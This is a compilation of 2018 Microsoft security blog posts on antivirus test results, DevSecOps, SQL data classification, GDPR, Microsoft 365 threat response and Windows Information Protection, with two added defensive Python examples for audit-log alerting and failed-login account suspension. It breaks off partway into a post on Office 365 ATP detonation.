Adding transparency and context into industry AV test results


Corporate Vice President Brad Anderson recently shared his insights on how Windows Defender Advanced Threat Protection (Windows Defender ATP) evolved to achieve important quality milestones. Our Windows Defender ATP team is committed to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions. In the continued spirit of these principles, we want to share the results of the January-February 2018 test conducted by independent antivirus tester AV-TEST and provide a transparency report that augments the test findings with contextual information to help our customers make informed decisions about Windows Defender ATP adoption.

Download the complete transparency report on January-February 2018 test results


At a high level, the transparency report shows:

  • Protection: Windows Defender Antivirus (Windows Defender AV) achieved a perfect score in Protection, maintaining consistently high scores in this category.
  • Usability (false positives): Windows Defender AV achieved an improved Usability score of 5.5/6.0. Per our telemetry, samples that Windows Defender AV incorrectly classified (false positives) had very low prevalence and are not commonly used in a business context.
  • Performance: Windows Defender AV improved this cycle, achieving a 5.5/6.0 Performance score and outperforming the industry in almost all areas. These results reflect the investments we put into optimizing Windows Defender AV performance for high-frequency actions (e.g., application run).


While independent tests can help assess a security solution's capabilities and protections, it is important to understand that antivirus tests are only one part of a complete quality assessment. To truly understand the protection quality of an endpoint protection platform (EPP) and endpoint detection and response (EDR) solution like Windows Defender ATP, its entire set of capabilities must be evaluated.

For instance, while Windows Defender ATP's antivirus capability achieved a perfect overall Protection score in the January-February 2018 tests and only missed two out of thousands of samples tested, it performed even better than the results suggest. The Windows Defender Security Intelligence team tested the two missed samples against the entire Windows Defender ATP stack to assess these samples' ability to infect machines in real-world enterprise environments. The team was able to confirm that the two missed samples were detected and mitigated by other components of the Windows Defender ATP stack.


As threats become more sophisticated, Microsoft and other security platform vendors continue evolving their product capabilities to detect threats across different attack stages. We hope to see independent testers evolve their methodologies as well. Our customers need greater transparency and optics into what an end-to-end solution can accomplish in terms of total preventive protection, including the quality of individual components like antivirus. Microsoft is highly engaged in working with several independent testers to evolve security testing to focus on end-to-end security stack testing.

Meanwhile, we continue to focus on improving our next-generation antivirus solution while at the same time delivering new innovative capabilities like attack surface reduction and hardware-based isolation, just to name a few. In the Windows 10 April 2018 Update, you can experience these new and improved capabilities in Windows Defender ATP, which provides a complete endpoint protection platform (EPP) and endpoint detection and response (EDR) solution. To see these capabilities for yourself, sign up for a 90-day trial of Windows Defender ATP today, or enable Preview features on existing tenants.



Zaid Arafeh

Senior Program Manager, Windows Defender Research team



Want better apps? You need a (agile security) hero!

If we've learned anything from the rise of the Marvel Cinematic Universe, it's that good things tend to happen when heroes intervene. For securing new applications, this metaphor is a useful one because security isn't always top-of-mind for scrum teams, nor is it always conducive to meeting aggressive deadlines. But in the world of software security these heroes are critical because they are risk-aware, highly skilled developers who understand software design, robust development, and the importance of architecting for resiliency.

During my session at IANS Los Angeles Information Security Forum this week about driving security into DevSecOps, I was reminded how difficult it is for company leaders who are strapped for time and resources to find, train, and integrate these heroes. While I covered topics like how to measure the maturity of a DevSecOps program, and ways to incentivize the development team to work with security, the conversation often came back to finding good people and getting them integrated into existing team processes.

Meanwhile, more organizations are moving to a full continuous integration/continuous deployment (CI/CD) model for faster software development, as consumer demands evolve faster than ever and expectations rise alongside the rapid deployment of new enhancements and features in the marketplace. While this model can help improve the speed of new technology to market, the core of its success or failure is how well scrum teams collaborate to address complex design and implementation problems. Communication is another critical component, and can be the difference between a successful launch and an insurmountable gating factor, such as needing to punch a new hole in the firewall to get a service to run. The bottom line is that nobody wins when security is compromised to stand up a new release.

Scrum teams need a security master to facilitate this communication. But this individual isn't a scrum dictator sent to hijack control. They should be a facilitator who works with the scrum team and product owner to drive security into the development process. This is where these individuals really start to attain hero status, because they aren't just defining a critical set of security requirements; they are relationship builders fostering new collaborations.

A collaborative DevSecOps security hero guides the team through general security requirements, features, functions, and architectures in an appropriate fashion and cadence that can easily be integrated into existing processes. It's important for this scope of work to be well defined and present to meet the team's Definition of Done (DoD). Specific requirements defined by individual user stories in the working code sprint help speed the process by ensuring security is represented properly in the DoD. These user stories are important artifacts that can be utilized by the entire scrum team for better alignment, and ensure there are no lengthy gating gotchas at the end of the process.

For example, a common vulnerability in modern applications revolves around the improper use, or lack of use, of cryptography when encrypting sensitive data. A general requirement could be written to protect data entered in a form cryptographically that ties back to a user story about a phase-locked loop (PLL). Once the data is encrypted it can be sent to a server team with agile security experts. By writing these agile security requirements and by addressing them systematically at all levels of the development process, teams can layer security into existing user stories more quickly, resulting in apps, services, or products with fewer vulnerabilities.

So where do scrum teams find these heroes? The right person might be closer than you think. Often you don't need to hire an outsider or pilfer resources from the security operations center. Instead, you can evaluate in-house developers with an affinity for security, a code expert in the reverse engineering team, or anyone in the release pipeline really who is interested, engaged, and shows the acumen to be a part of what the organization is looking to accomplish. The key, once you've identified and selected this individual, is to nurture them. Provide additional security training, allow them the requisite time to fully understand the current processes in play, and ensure their annual business goals reflect their security work. Remember, if someone is only rewarded for speed, security will take a back seat and your apps, services, and products will suffer.

Every organization has unique challenges, so start with one team and learn what works and what doesn't work before making broad, sweeping changes. Once the process is clicking, and new security requirements are flowing into your applications, you can radiate out the agile security hero model to your other internal, and even external (sourced via a third party), teams. Implementing this model doesn't mean your code will be perfectly secure. But having a security-minded advocate in the scrum makes it a lot easier to incorporate secure measures and features into new releases.


Data classification and protection now available for structured data in SQL

This post is authored by Gilad Mittelman, Senior Program Manager, SQL Data Security.

Data privacy and data security have become one of the most prominent topics in organizations in almost every industry across the globe. New regulations that formalize requirements are emerging around these topics and compel organizations to comply.

The upcoming EU General Data Protection Regulation (GDPR), which takes effect on May 25, 2018, is one of the most noteworthy of these new regulations. It sets a new global bar for privacy rights, security, and compliance, mandating many requirements and obligations on organizations across the globe. Complying with this regulation will necessitate significant investments in data handling and data protection for a very large number of organizations.

GDPR and Microsoft SQL

SQL Information Protection (SQL IP), now in public preview, complements the existing Microsoft Information Protection (MIP) unstructured data classification framework (Azure Information Protection, Microsoft 365) and extends it with new structured data classification capabilities.

Microsoft SQL customers who are subject to the GDPR, whether managing cloud-based or on-premises databases or both, will need to ensure that qualifying data in their database systems is aptly handled, protected and monitored according to GDPR principles. This means that many customers will need to review or modify their database management and data handling procedures, especially focusing on the security of data processing as stipulated in the GDPR. The first step in this journey to compliance is discovering and tagging where such sensitive data resides within the database environment.

SQL IP introduces advanced capabilities built into Azure SQL Database and SQL Server for discovering, classifying, labeling and protecting the sensitive data in your SQL databases.

Discovering and classifying your most sensitive data (business, financial, healthcare, PII, etc.) can play a pivotal role in your organizational information protection posture. It can serve as infrastructure for:

  • Helping meet data privacy standards and regulatory compliance requirements, such as GDPR.
  • Data-centric security scenarios, such as monitoring (auditing) and alerting on anomalous access to sensitive data.
  • Controlling access to and hardening the security of databases containing highly-sensitive data.

What is SQL Information Protection?

SQL IP introduces a set of advanced services and new SQL capabilities, forming a new information protection paradigm in SQL aimed at monitoring and protecting the data, not just the database:

  • Discovery and recommendations – A built-in classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you an effortless way to review and apply the appropriate classification recommendations via the Azure portal or via SQL Server Management Studio.
  • Labeling – Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
  • Monitoring/Auditing – Sensitivity of the query result set is calculated in real time and used for auditing access to sensitive data. Additional logic can then be applied on top of the audit logs, for identifying and alerting on anomalous access to sensitive data, data extraction of large volumes of PII, etc.
  • Visibility – The database classification state can be viewed in a detailed dashboard in the portal as seen in Figure 1 below. Additionally, you can download a report (in Excel format) to be used for compliance & auditing purposes, as well as other needs.
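The "additional logic on top of the audit logs" that the Monitoring/Auditing item describes, as an added illustration that is not part of SQL Information Protection: given a column-to-label classification map (the kind of metadata the Labeling item persists), it derives the sensitivity of each audited result set and alerts when one principal extracts a large volume of PII rows within a time window. The label names, information types, column names and audit records are all constructed for the example.

```python
"""Sensitivity-aware review of database audit records (illustrative, not SQL IP code)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Label ranks, highest first. Names are illustrative, not a fixed product label set.
LABEL_RANK = {"Highly Confidential": 3, "Confidential": 2, "General": 1, None: 0}

# Information types we treat as personal data for volume alerting (constructed).
PII_TYPES = {"Contact Info", "National ID", "Name"}

# Constructed classification metadata: fully qualified column -> (information type, label).
CLASSIFICATIONS = {
    "dbo.Customers.Email": ("Contact Info", "Confidential"),
    "dbo.Customers.SSN": ("National ID", "Highly Confidential"),
    "dbo.Customers.Name": ("Name", "Confidential"),
    "dbo.Orders.Total": ("Financial", "Confidential"),
    "dbo.Orders.OrderId": (None, None),
}


@dataclass
class AuditRecord:
    time: datetime
    principal: str
    columns: tuple   # fully qualified columns present in the result set
    rows: int        # rows returned by the statement


def result_set_sensitivity(columns):
    """Return (highest label across the returned columns, number of PII columns)."""
    top = None
    pii_columns = 0
    for col in columns:
        info_type, label = CLASSIFICATIONS.get(col, (None, None))
        if LABEL_RANK.get(label, 0) > LABEL_RANK[top]:
            top = label
        if info_type in PII_TYPES:
            pii_columns += 1
    return top, pii_columns


def bulk_pii_alerts(records, row_threshold=1000, window=timedelta(hours=1)):
    """Flag each principal whose PII rows in any sliding window exceed row_threshold.

    Returns a list of (principal, time of the triggering statement, rows in window).
    """
    by_principal = defaultdict(list)
    for rec in sorted(records, key=lambda r: r.time):
        _, pii_columns = result_set_sensitivity(rec.columns)
        if pii_columns == 0:
            continue  # no personal data in this result set; not counted
        by_principal[rec.principal].append((rec.time, rec.rows))

    alerts = []
    for principal, events in by_principal.items():
        start, total = 0, 0
        for t, rows in events:
            total += rows
            while t - events[start][0] > window:   # drop statements outside the window
                total -= events[start][1]
                start += 1
            if total > row_threshold:
                alerts.append((principal, t, total))
                break  # one alert per principal is enough for this illustration
    return alerts


BASE = datetime(2018, 5, 22, 9, 0)
# Constructed audit trail: an app doing small lookups, an analyst pulling PII in bulk,
# a report over non-PII financial data, and a backup job whose pulls are an hour apart.
SAMPLE_RECORDS = (
    [AuditRecord(BASE + timedelta(minutes=3 * i), "app_svc",
                 ("dbo.Customers.Email",), 50) for i in range(10)]
    + [AuditRecord(BASE + timedelta(minutes=20 * i), "analyst",
                   ("dbo.Customers.Name", "dbo.Customers.SSN"), 400) for i in range(3)]
    + [AuditRecord(BASE, "reporting", ("dbo.Orders.OrderId", "dbo.Orders.Total"), 5000)]
    + [AuditRecord(BASE - timedelta(hours=1), "backup_svc", ("dbo.Customers.Email",), 600),
       AuditRecord(BASE + timedelta(hours=1), "backup_svc", ("dbo.Customers.Email",), 600)]
)


def demo():
    """Run the alerting logic over the constructed audit trail."""
    return bulk_pii_alerts(SAMPLE_RECORDS)


if __name__ == "__main__":
    for principal, when, rows in demo():
        print(f"ALERT {principal}: {rows} PII rows within one hour ending {when:%H:%M}")
```

Only the analyst trips the alert: the app stays under the threshold, the financial report touches no PII columns, and the backup job's two pulls fall in different windows.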

Figure 1: Data discovery and classification dashboard

SQL Information Protection in action: demo video

The following video demonstrates the main SQL Information Protection public preview capabilities for Azure SQL DB and SQL Server:

What’s next?

Additional SQL IP capabilities will continue rolling out throughout the upcoming year, with a focus on scale and automation.

We'll be introducing centralized management via Azure Security Center, enabling organizations to customize the organizational information protection policy with proprietary labels and discovery (recommendations) logic enrichment. We'll also be introducing centralized dashboards for visibility into the sensitivity state of all resources across the entire database estate.

In addition, various automation capabilities will be exposed, for supporting fully automated classification and labeling of large numbers of databases at scale.

We encourage customers to contact us with any questions or feedback at

Additional resources on SQL Information Protection

More details on using SQL Information Protection can be found in:


Partnerships power the future of better security

This post is authored by Jeremy Dallman, Principal Program Manager.


Our goal in building the Microsoft Graph Security API is to enable customers to share insights and take action across security solutions to improve protection and speed response. By creating a connected security ecosystem, Microsoft and partners can enable developers to simplify integration and alert correlation, unlock valuable context to aid investigation, and streamline security operations.

Palo Alto Networks shares the vision of enabling better integration to benefit our joint customers. They are a member of the Microsoft Intelligent Security Association, and as part of the Graph Security API launch at RSA, we showcased an application that demonstrated the power of integration between multiple Microsoft and Palo Alto Networks security offerings. We demonstrated how a Palo Alto Networks provider for the Security Graph can prevent successful cyberattacks by correlating alerts from Microsoft with its threat intelligence, firewall logs, and automated firewall policy changes.

Microsoft Graph Security API proof of concept integration using PowerBI

Our close collaboration continues, and this week at the Palo Alto Networks user conference, Ignite 2018, we will unveil the latest joint innovation. Microsoft and Palo Alto Networks have worked to connect the Microsoft Graph Security API and the Palo Alto Networks Application Framework with a provider that brokers interactions between the two platforms. We will also demo a Microsoft PowerBI solution that accesses information from both the Palo Alto Networks Application Framework and the Microsoft Graph Security API, giving our customers the ability to query and access all of their security data through a common interface.

For those attending Ignite this week, be sure to join the Wednesday (5/23) 4:00PM session where Jason Wescott and Francesco Vigo will discuss the collaboration between Microsoft Graph Security API and the Palo Alto Networks Application Framework. If you aren't at Ignite, visit the Graph Security API documentation or sign up to request access to the Palo Alto Networks Application Framework API to start exploring how you can take advantage of this powerful collaboration!


Now that you have a plan, it’s time to start deploying

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, you'll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, First Things First: Envisioning Your Security Deployment.

In our previous blog post, we covered how FastTrack for Microsoft 365 can help you envision a successful Microsoft 365 security deployment. Now, we'll cover the next phase of our three-phase planning approach: Onboard. This is where you move from strategy and objectives to the practical details of your deployment planning.

The Onboard phase is a critical time to remove any blockers you have, clean up any issues that might prevent your preferred deployment approach, and then start setting up services and users that integrate with your environment. The FastTrack team can help coordinate the setup, configuration, and provisioning of many of your Microsoft 365 services.

We will cover how to Drive Value with FastTrack for Microsoft 365 in our next blog. But first:

Your onboard checklist

The following checklist provides some of the items and actions that our FastTrack team can help you work through during the Onboard phase:

Network and Client

  • Identify and prepare DNS, network, and infrastructure needs
  • Configure DNS for eligible services
  • Configure TCP/IP protocols and firewall ports
  • Identify and prepare client needs (Internet browser, client operating system, and services’ needs)
  • Enable eligible services that have been purchased and defined as part of onboarding
  • Establish the timeline for remediation activities
  • Activate your Microsoft online service tenant or subscription
  • Validate connectivity to Microsoft online services


  • Provision user identity including licensing
  • Configure Azure AD Identity Protection
  • Configure Self Service Password Reset (SSPR)
  • Configure Azure Multi-Factor Authentication
  • Configure Privileged Identity Management
  • Set up Azure AD Conditional Access policies
  • Synchronize Azure AD Connect directory (with password writeback and password hash sync)

Access Management

  • Configure identities to be used by Intune, by either leveraging your on-premises Active Directory or cloud identities (Azure AD)
  • Add users to your Intune subscription, define IT admin roles (Helpdesk operator, admins, etc.), and create user and device groups
  • Configure and deploy Intune app protection policies for each supported platform and prepare line-of-business apps for app protection policies

Mobile Device Management (MDM)

  • Configure your MDM authority and policies and test to validate MDM management policies
  • Configure profiles on devices for supported platforms
  • Enroll devices of each supported platform to Intune or Configuration Manager with Microsoft Intune service

Ready for action? Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of the Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value and adoption with users.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

FastTrack provides end-to-end guidance for planning, onboarding, and driving end user adoption for Microsoft 365, which comprises Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

More blog posts from this series:


Securing the modern workplace with Microsoft 365 threat protection – part 4

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Responding to ransomware in the Modern Workplace

Over the last few weeks, we have shared the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect against and detect a modern ransomware attack. Today, we conclude our blog series by discussing how Microsoft 365 threat protection can help respond to attacks and also helps educate and raise awareness of threats to end users. In our ransomware scenario, once the threat has been detected, Microsoft 365 also helps respond and remediate, with automation playing a key role in making the response more manageable, accurate, and less time consuming for administrators. Microsoft 365 threat protection response and remediation services are shown in figure 1 below.

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace (figure title: "Ransomware Detection with Microsoft 365"; services shown: Windows Defender Advanced Threat Protection, Azure Advanced Threat Protection, Microsoft Cloud App Security, Azure Security Center, Office 365 Advanced Threat Protection, Office 365 Threat Intelligence)

In our ransomware scenario, Windows Defender Advanced Threat Protection (WDATP) alerts security operations teams about suspicious activities such as programs launching self-replicating copies. If the ransomware does manage to infect multiple devices, WDATP automatically investigates alerts, applies artificial intelligence to determine whether a threat is real, and then decides what action to take. It then automatically remediates the threat from affected endpoints to stop further damage, as shown in figure 2.

Figure 2. WDATP automation mapping the propagation of a threat

WDATP provides manual machine level responses, such as isolating a machine to contain the threat. Further, forensic data is collected to better understand the attack and the attacker. WDATP also includes file level response by quarantining or blocking malicious files. Azure Security Center also leverages automation by helping orchestrate these common security workflows:

  • Routing alerts to a ticketing system
  • Applying additional security controls
  • Gathering additional information
  • Asking a user to validate an action
  • Blocking a suspicious user account
  • Restricting traffic from an IP address

Azure Security Center employs behavioral analytics to uncover patterns and malicious activity, enabling proactive policies to be set in place to help prevent impact from future attacks. Response times are also improved with expanded signal from Azure Security Center's third-party integrations with firewalls and anti-malware engines. While Azure Security Center enables security operations personnel to respond to threats to the enterprise infrastructure, admins can quickly respond to threats to user identities by creating activity policies with Microsoft Cloud App Security (shown in figure 3), which can take the action of suspending a user account when the predefined conditions are met. In our example, the ransomware propagates using the brute-force password technique, which requires multiple login attempts; repeated login failures from a single account are therefore likely, and this can be a trigger for Microsoft Cloud App Security to suspend the account. One of the powerful benefits of Microsoft Cloud App Security is that it extends protection beyond the Microsoft ecosystem. Even if login attempts are made from popular enterprise applications that are not Microsoft client apps, Microsoft Cloud App Security enables admins to respond to the anomalous activity.
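The activity-policy behaviour described above, as an added example that is not Microsoft Cloud App Security's own engine: sign-in events are evaluated as they arrive, and once one account accumulates a threshold of failed logins inside a time window (regardless of which app, Microsoft or not, the attempts came through) a "suspend user" action is emitted once and later attempts for that account are ignored. Threshold, window, app names and the event stream are constructed for the example.

```python
"""Brute-force login response modelled as an activity policy (illustrative code)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


class FailedLoginPolicy:
    """Suspend an account after `threshold` failed logins within `window`."""

    def __init__(self, threshold=5, window=timedelta(minutes=10)):
        self.threshold = threshold
        self.window = window
        self.failures = defaultdict(deque)  # account -> deque of (time, app)
        self.suspended = set()
        self.actions = []                    # governance actions taken, in order

    def process(self, ts, account, app, outcome):
        """Evaluate one sign-in event; return the action taken, or None."""
        if account in self.suspended:
            return None          # already acted on; avoid duplicate actions
        if outcome != "failure":
            return None          # successes do not count toward the threshold
        history = self.failures[account]
        history.append((ts, app))
        while history and ts - history[0][0] > self.window:
            history.popleft()    # forget failures that fell out of the window
        if len(history) >= self.threshold:
            self.suspended.add(account)
            action = {
                "action": "suspend_user",
                "account": account,
                "at": ts,
                "failures": len(history),
                "apps": sorted({a for _, a in history}),
            }
            self.actions.append(action)
            return action
        return None


def run_policy(events, **policy_kwargs):
    """Replay (time, account, app, outcome) events in time order; return actions taken."""
    policy = FailedLoginPolicy(**policy_kwargs)
    for event in sorted(events):
        policy.process(*event)
    return policy.actions


BASE = datetime(2018, 5, 22, 9, 0)
m = lambda minutes: BASE + timedelta(minutes=minutes)
# Constructed sign-in stream. "Salesforce" stands in for a non-Microsoft app, since the
# post notes that Cloud App Security sees those attempts too.
EVENTS = [
    # svc-backup: a burst of failures across two apps, then one more after suspension
    (m(0), "svc-backup", "Office 365", "failure"),
    (m(1), "svc-backup", "Office 365", "failure"),
    (m(2), "svc-backup", "Salesforce", "failure"),
    (m(3), "svc-backup", "Office 365", "failure"),
    (m(4), "svc-backup", "Salesforce", "failure"),
    (m(5), "svc-backup", "Office 365", "failure"),
    # alice: occasional typos spread over 40 minutes, never 5 inside 10 minutes
    (m(0), "alice", "Office 365", "failure"),
    (m(5), "alice", "Office 365", "success"),
    (m(20), "alice", "Office 365", "failure"),
    (m(40), "alice", "Office 365", "failure"),
    # bob: four failures then a success, just under the threshold
    (m(10), "bob", "Salesforce", "failure"),
    (m(11), "bob", "Salesforce", "failure"),
    (m(12), "bob", "Salesforce", "failure"),
    (m(13), "bob", "Salesforce", "failure"),
    (m(14), "bob", "Salesforce", "success"),
]


def demo():
    """Run the policy over the constructed stream."""
    return run_policy(EVENTS)


if __name__ == "__main__":
    for action in demo():
        print(f"{action['at']:%H:%M} {action['action']} {action['account']} "
              f"after {action['failures']} failures via {', '.join(action['apps'])}")
```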


Figure 3. Microsoft Cloud App Security General Dashboard

In Microsoft 365, threat response and remediation is offered with Office 365 Threat Intelligence. Using the Threat Explorer feature, security analysts and administrators can search for all instances of potentially malicious emails that may contain ransomware. The back-end is designed for efficient threat investigation and remediation. Emails that are part of a ransomware campaign can easily be discovered using a variety of search filters with the Threat Explorer shown in figure 4. The admin can select all the emails that need to be investigated from a specific sender and choose to take immediate action on potentially malicious emails including: move to junk, move to deleted items, soft delete, hard delete, and move to inbox. Choosing the delete action purges the malicious emails from all tenant mailboxes. There is also the option of creating an incident so that a manager must approve the action.

Figure 4. Office 365 Threat Explorer email remediation actions

Educating end users about ransomware in the modern workplace

We discussed cyber education as an important element for protecting organizations. Having end users who are prepared and informed on spotting potential cyberattacks is a powerful way of preventing attacks from harming an organization. Attack Simulator, shown in figure 5, is a new feature of Office 365 Threat Intelligence currently in public preview. Among several simulations is the Display Name Spear Phishing Attack. Spear phishing is a subset of phishing, aimed at a specific group, individual, or organization and, as we discussed before, a method of spreading ransomware. Attack Simulator harnesses signal from Office 365 Threat Intelligence, which provides visibility into an organization's most targeted and potentially most vulnerable users and enables admins to launch simulated threats targeting those very same users. This provides the most targeted users with training on recognizing phishing emails, which include ransomware, and provides admins visibility on how those users behave during an attack, enabling optimal policy updates and security protocols.

Figure 5. Attack Simulator UI

Since the attack surface of the modern workplace is complex and broad, Attack Simulator will begin to offer simulated attacks made through other attack vectors as it moves from preview to GA. Attack Simulator will help raise user awareness and effectiveness at spotting attacks from all the common attack vectors.

Microsoft 365 threat protection

Microsoft has heavily invested in helping secure our customers for many years by building security into our products from the ground up. In the last few years, as the level of cybercrime has increased, we have also increased our efforts and focus on developing and continuously updating advanced security solutions to protect customers from a wide variety of threats and types of attack. In this ransomware scenario, you see an example of our continued focus on security, which provides end users ultimate protection from modern threats, while giving administrators a powerful set of tools to help protect, detect, respond and even educate against these threats. Threat protection is only one key aspect of Microsoft 365. Learn more about Microsoft 365 and understand how it can help your organization through its digital transformation journey. Additionally, follow the links below to learn more about the Microsoft 365 threat protection services and experience them by starting a trial.


Use Windows Information Protection (WIP) to help make accidental data leakage a thing of the past

Have you always wished you could have mobile application management (MAM) on Windows?

Now you can!

Windows Information Protection (WIP) is an out-of-the-box data leakage prevention feature for Windows 10 that can automatically apply protection for work files and data to prevent accidental data leakage. With 600 million active Windows 10 devices, corporate customers continuing to deploy in earnest throughout 2018, and support for WIP built right into Office 365 ProPlus, its benefits are within easy reach.

Sixty to eighty percent of data leakage is accidental (see ICO data for 2016 and 2017). WIP is a key feature that offers much needed data protection for files at rest on the Windows platform, for any organization with sensitive data, big or small. In today's security ecosystem, companies are spending $93B on security features (enough to host seven Olympic Games!). Yet companies still saw a 29 percent increase in data leakage worldwide between 2016 and 2017. WIP comes as a timely solution.

With Windows 10, Microsoft is providing a fundamental solution to this growing problem. Recognizing that the risk of leak comes from both fully managed devices and personal devices accessing work resources, we designed WIP to be deployed on PC and mobile devices running Windows 10. WIP is designed for organizations of all shapes and sizes, as a scalable solution that works to prevent accidental data leakage for end users.

WIP protects users and organizations from accidental leaks via copy-and-paste, drag-and-drop, removable storage (e.g., USB thumb drives), and unauthorized applications (e.g., non-work cloud storage providers). Windows shell integration appears in clear but unobtrusive ways. Elements like File Ownership are displayed and selectable in Explorer and the File Save As dialog. Helpful briefcase icons mark resources when you are in a work context in places like window title bars and Microsoft Edge's navigation bar. Unauthorized applications are blocked from single sign-on with work credentials. WIP also includes the ability to perform a selective wipe of business information, while leaving personal data behind.

WIP has three simple policy enforcement modes. It lets you choose how, and whether, the user experience in the clipboard, save dialog, and similar data-sharing cases offers options (overrides) to move work content to a non-work context. You can decide to Hide Overrides, Allow Overrides for your users, or even deploy in Silent mode just for auditing. Silent mode does not restrict unmanaged apps from opening work data the way Hide Overrides and Allow Overrides do, so you can get away with configuring less while still benefiting from the BYOD selective wipe capability for your work data, such as data downloaded from OneDrive for Business and Outlook email. This means that when you or your user decides to unenroll their work account from their personal device, that work data stops being accessible.

WIP policy can be deployed in a few clicks in Microsoft Intune for MAM-only (without enrollment) targeting, MDM (with enrollment), or both. Being able to apply MAM-only policy will help you finally enable BYOD in regions and situations where fully managing the personal device is unacceptable. For companies that are not yet fully in the cloud, WIP policy can also be set on domain-joined computers using System Center Configuration Manager. Then, when you're ready for co-management, you can move the WIP policy management authority to Microsoft Intune.

Your corporate files can also be automatically encrypted with a local key when downloaded to WIP-managed devices. You can do this by configuring your corporate network boundary. Using network isolation policies, you can identify your LAN and corporate cloud resources, which Edge and other applications will use to recognize work sites and encrypt the data that comes from there. This works even better when combined with Conditional Access controls on Exchange Online and SharePoint Online to ensure that only managed devices can reach that data.

Additionally, WIP Learning lets you see the applications you didn't know were used with work data. It reports any app not in your policy that tries to access a work resource. You can see this data in Microsoft Intune or your Windows Analytics portal, if you have Azure Log Analytics (formerly Microsoft Operations Management Suite or OMS). WIP Learning allows you to tune your app policy to add legitimate work apps and even detect apps that should not be trying to access work data. Combined with Silent mode, you can deploy and see the immediate benefit of selective wipe control and auditing, while tuning your app list for different deployment groups in preparation for enabling boundary enforcement.

WIP provides a robust and automatic solution for protecting work data coming to the Windows device, but it also pairs well with Azure Information Protection (AIP). AIP adds the ability to control and help secure email, documents, and sensitive data that are shared, even outside your company and in the Azure cloud. WIP, combined with AIP, provides application-level access control capabilities while preventing unauthorized applications from accessing business information at rest and in flight. At the same time, WIP's simple business vs. personal information classification system ensures simplicity and ease of use.

USB flash drives aren't the only way data can leave a device. With the app restrictions on accessing work data, you can use WIP to guide users to use Outlook with their corporate email account to send work attachments, and SharePoint or OneDrive for Business to collaborate on work documents. This lets you enhance your overall data protection with Office DLP outbound rules, email notifications, policy tips, and Office 365 Information Protection for GDPR.

WIP originally shipped in the Windows 10 Anniversary Update (version 1607) and since then, working across Microsoft and with industry, we have made a number of improvements, including:

  1. Support for Office 365 ProPlus, Microsoft Teams, and numerous inbox apps
  2. Simplified management: Intune quick setup, WIP Learning for Apps and Network Boundary policy
  3. Manageable as MAM-only (i.e. without full device enrollment)
  4. Improved Recovery (e.g. data access resumes via re-enrollment or re-adding your work account)
  5. AIP integration to enable roaming data on removable storage (e.g. USB thumb drives)
  6. Support from 3rd party apps such as from Citrix (ShareFile), DropBox (desktop sync client), Foxit (Reader, PhantomPDF), and WinZip (WinZip 21, WinZip 22)

With all these features available, WIP is easier than ever to deploy and maintain. Enable this fast, robust, user-friendly security solution to help ensure a more effortlessly secure user experience for your organization.

More information on Windows Information Protection (WIP) can be found in the following resources:

The final compliance countdown: Are you ready for GDPR?

On May 25, the General Data Protection Regulation (GDPR) will replace the Data Protection Directive as the new standard on data privacy for all organizations that do business with European Union (EU) citizens.[1] When GDPR goes into effect, government agencies and organizations that control, maintain, or process information involving EU citizens will be required to comply with strict new rules regarding the protection of personal customer data.

GDPR's broad scope and holistic interpretation of personal information leaves these agencies and organizations responsible for protecting a wide range of data types, including genetic and biometric data.[2] Leading up to the GDPR rollout, many companies will be reevaluating their current data storage and sharing methods, and determining whether they need to implement new strategies. More than ever, this regulatory transition highlights the importance of prioritizing a strong and comprehensive security stance within your organization.

According to a recent GDPR benchmarking survey, although 89 percent of organizations have (or plan to have) a formal GDPR-readiness program, only 45 percent have completed a readiness assessment.[3] Regardless of where your organization and its security protocols are in terms of GDPR readiness, Microsoft can help. Microsoft has been working on GDPR-compliant business and engineering solutions for the better part of a year. Because of our extensive experience developing products with security built in, we've been a leading voice on privacy and GDPR-related issues with EU regulators.

We've turned these conversations and insights into a free, four-part video series. Watch the Countdown: Preparing for GDPR series today to hear from industry experts and learn more about Microsoft's commitment to helping your organization achieve GDPR compliance.

You can also read more about our point of view on this transition as the first hyper-scale cloud vendor to offer GDPR terms and conditions in the enterprise space.

Finally, you are invited to a free May 25th GDPR live webcast, Safeguarding individual privacy rights with the Microsoft Cloud. You'll learn how you can:

  • Use GDPR fundamentals to assess and manage your compliance risk.
  • Help protect your customers’ data with our built-in, intelligent security capabilities.
  • Meet your own compliance obligations by streamlining your processes.





Enhancing Office 365 Advanced Threat Protection with detonation-based heuristics and machine learning

Email, coupled with reliable social engineering techniques, continues to be one of the primary entry points for credential phishing, targeted attacks, and commodity malware like ransomware and, increasingly in the last few months, cryptocurrency miners.

Office 365 Advanced Threat Protection (ATP) uses a comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against a wide range of threats. Machine learning technologies, powered by expert input from security researchers, automated systems, and threat intelligence, enable us to build and scale defenses that protect customers against threats in real-time.

Modern email attacks combine sophisticated social engineering techniques with malicious links or non-portable executable (PE) attachments like HTML or document files to distribute malware or steal user credentials. Attackers use non-PE file formats because these can be easily modified, obfuscated, and made polymorphic. These file types allow attackers to constantly tweak email campaigns to try slipping past security defenses. Every month, Office 365 ATP blocks more than 500,000 email messages that use malicious HTML and document files that open a website with malicious content.

Figure 1. Typical email attack chain

Detonation-based heuristics and machine learning

Attackers employ several techniques to evade file-based detection of attachments and blocking of malicious URLs. These techniques include multiple redirections, large dynamic and obfuscated scripts, HTML for tag manipulation, and others.

Office 365 ATP protects customers from unknown email threats in real-time by using intelligent systems that inspect attachments and links for malicious content. These automated systems include a robust detonation platform, heuristics, and machine learning models.

